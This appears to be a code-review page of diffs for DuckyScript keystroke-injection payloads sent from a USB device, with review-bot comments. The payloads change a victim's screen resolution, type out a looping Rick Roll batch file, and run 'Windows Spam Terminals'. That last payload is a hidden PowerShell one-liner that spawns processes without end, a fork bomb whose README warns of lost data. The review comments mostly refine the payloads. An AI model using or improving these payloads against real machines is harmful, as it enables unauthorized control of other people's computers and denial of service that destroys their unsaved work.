This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||||
|
|
||||||
|
### Somewhat resource dependent, may not work on older computers
|
|
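Review bot: The README uses a `###` heading for what is really a caveat ("Somewhat resource dependent, may not work on older computers") and never states the supported versions, although the payload header on this page says `Any system running Windows 10/11`. Turn the heading into a normal sentence or a "Notes" section, add the target versions, and capitalise "Windows". It would also help to say how long the LED flashing lasts before the CAPS press is accepted.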
@ -0,0 +1,103 @@
|
||||||
|
REM TITLE Resolution Prank
|
||||||
|
REM AUTHOR Mavisinator30001
|
||||||
|
REM TARGET Any system running Windows 10/11
|
||||||
|
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
LED_G
|
||||||
|
DELAY 500
|
||||||
|
CTRL GUI d
|
||||||
|
DELAY 500
|
||||||
|
GUI i
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN display
|
||||||
|
DELAY 2500
|
||||||
|
TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REPEAT 8 TAB
|
||||||
|
ENTER
|
||||||
|
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||||
|
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||||
|
HOLD DOWN
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE DOWN
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||||
|
VAR $LIGHT_UP_TIMES = 20
|
||||||
|
WHILE ($LIGHT_UP_TIMES > 0)
|
||||||
|
LED_G
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
LED_R
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||||
|
END_WHILE
|
||||||
|
WAIT_FOR_CAPS_CHANGE
|
||||||
|
END_WHILE
|
||||||
|
DELAY 300
|
||||||
|
REPEAT 12 TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
HOLD UP
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE UP
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 200
|
||||||
|
CTRL GUI F4
|
|
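Review bot: `IF $_OS != WINDOWS` directly after END_EXTENSION is missing the parentheses and `THEN` that every other conditional in this file uses (compare `IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN`); write it as `IF ($_OS != WINDOWS) THEN` so the guard before `STOP_PAYLOAD` is parsed the same way. Likewise `$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1` should follow the parenthesised form used for `$MAX_TRIES`. The `WHILE ($CAPS_STATE == $_CAPSLOCK_ON)` loop ends its body with `WAIT_FOR_CAPS_CHANGE`, so it can only run once; drop the loop and the `$CAPS_STATE` variable, or add a REM explaining the intent. `WAIT_FOR_CAPS_CHANGE` is also reached only after the 20 flash cycles (about 24 seconds of DELAYs), which the README should mention. The fixed `REPEAT 8 TAB` and `REPEAT 12 TAB` counts deserve a comment naming the Settings control they are meant to reach.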
@ -5,9 +5,10 @@ REM
|
||||||
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
||||||
REM Notes: Creates batch file, starts batch file, minimizes the window
|
REM Notes: Creates batch file, starts batch file, minimizes the window
|
||||||
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
||||||
REM Version: 1.3
|
REM Version: 1.5
|
||||||
REM Category: Prank
|
REM Category: Prank
|
||||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
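Review bot: The Version line goes from 1.3 to 1.5 with no 1.4 and no note of what changed. Record the changes for this bump (the added `ATTACKMODE HID STORAGE` line and the batch-file edits later in this file) in the Notes line or a short changelog REM, and confirm that skipping 1.4 is intentional.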
@ -20,6 +21,7 @@ DELAY 1000
|
||||||
STRING copy con rr.bat
|
STRING copy con rr.bat
|
||||||
ENTER
|
ENTER
|
||||||
STRING @ECHO OFF
|
STRING @ECHO OFF
|
||||||
|
ENTER
|
||||||
STRING PING 127.0.0.1 -n 5 > NUL
|
STRING PING 127.0.0.1 -n 5 > NUL
|
||||||
ENTER
|
ENTER
|
||||||
STRING :LOOP
|
STRING :LOOP
|
||||||
|
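Review bot: Nothing in the header records why the `ENTER` after `STRING @ECHO OFF` was added. Without it the `@ECHO OFF` and `PING 127.0.0.1 -n 5 > NUL` strings were typed onto one line of rr.bat, so this is a behaviour fix rather than a cosmetic edit and should be called out. Other payloads on this page use `STRINGLN` for a line plus newline; using it here would make a dropped ENTER harder to reintroduce.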
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
|
||||||
ENTER
|
ENTER
|
||||||
STRING GOTO LOOP
|
STRING GOTO LOOP
|
||||||
ENTER
|
ENTER
|
||||||
CTRL C
|
CTRL c
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING cls && rr.bat
|
STRING cls && rr.bat
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
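Review bot: The `CTRL C` to `CTRL c` change fixes the key case, but the line's purpose is still undocumented: it has to end the `copy con rr.bat` input so that `cls && rr.bat` finds a complete file. The conventional end-of-file for `copy con` is Ctrl+Z followed by Enter, so please confirm on the target versions that rr.bat is written in full with `CTRL c`, and add a REM saying what this keystroke is for.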
@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
|
||||||
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
||||||
REM Author: UberGuidoZ
|
REM Author: UberGuidoZ
|
||||||
REM Target: Windows (including Powershell 2.0 or above)
|
REM Target: Windows (including Powershell 2.0 or above)
|
||||||
|
REM Version: v1.1
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 3000
|
DELAY 3000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 750
|
DELAY 750
|
||||||
|
|
|
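Review bot: The added `REM Version: v1.1` uses a `v` prefix, while the other headers on this page write the bare number (`REM Version: 1.1`, `REM Version: 1.5`); pick one format so the field can be parsed consistently. The header also has no Category or Source line, unlike the sibling payloads by the same author, and there is no separator between the header and `ATTACKMODE HID STORAGE`.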
@ -0,0 +1,23 @@
|
||||||
|
# Windows Spam Terminals
|
||||||
|
|
||||||
|
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
|
||||||
|
|
||||||
|
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Windows Spam Terminals
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: Windows
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
This payload is plug and play <3
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
|
||||||
|
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
|
||||||
|
|
|
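Review bot: The README files this under **Category**: Prank while its own second paragraph warns that running it can cause unsaved data to be lost; a payload that spawns processes without limit is resource exhaustion and the category and title should say so. Add a section on how to stop it and restore the machine, since the README currently gives the operator no way back. Heading levels are inconsistent (`### Details`, `### Dependencies`, then `## How It Works`), and step 2 should read "the script executes a PowerShell command that creates".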
@ -0,0 +1,58 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Windows Spam Terminals #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
|
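Review bot: The PASSIVE_WINDOWS_DETECT extension sets `$_OS`, but the payload never checks it before `GUI r`, so the keystrokes are sent to any host; the Resolution Prank payload on this page guards with `STOP_PAYLOAD` when `$_OS` is not WINDOWS, and the same guard belongs here. The `while ($true)` in the STRINGLN line has no iteration cap and no sleep, which is what produces the data-loss risk the README warns about; bound the loop to a fixed count so the effect ends by itself. The nested quoting in that single line is also hard to audit and would benefit from a REM describing each level.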